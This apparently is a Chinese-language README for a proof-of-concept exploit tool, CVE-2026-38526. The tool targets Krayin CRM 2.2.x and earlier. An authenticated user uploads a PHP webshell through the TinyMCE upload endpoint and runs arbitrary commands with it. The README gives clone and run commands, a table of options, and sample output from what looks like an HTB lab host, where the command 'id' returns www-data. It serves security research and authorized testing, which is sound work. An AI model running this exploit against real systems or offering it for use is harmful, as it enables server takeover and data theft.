⚠️ 法律声明:此代码仅供教育目的 和授权测试使用(CTF、漏洞赏金、私人实验室)。 作者不对非法使用负责。
Krayin CRM (Webkul) ≤ 2.2.x 暴露了 /admin/tinymce/upload 端点,
允许已认证用户(即使是低权限用户)
上传文件而不进行扩展名验证。该文件随后
从 storage/ 目录提供服务,从而实现
PHP 代码的任意执行。
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
选项:
| 选项 | 描述 |
|---|---|
-t, --target | 目标根 URL |
-u, --user | Krayin 账户邮箱 |
-p, --password | 密码 |
-c, --command | 要执行的命令(默认:id) |
--login-path | 登录路径(默认:/admin/login) |
--upload-path | 上传路径(默认:/admin/tinymce/upload) |
--timeout | HTTP 超时(默认:15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] 正在从 http://billing.nexus.htb/admin/login 获取 CSRF token
[*] 正在提交登录表单
[+] 认证成功
[*] 正在通过 http://billing.nexus.htb/admin/tinymce/upload 上传 x8f2k1ab.php
[+] Webshell 可访问:http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] 执行:id
============================================================
[+] 命令:id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ 和 uploads/ 目录中执行 PHP。本项目发布用于安全研究目的。任何 未经事先书面授权而对系统进行的使用 均属非法且严格禁止。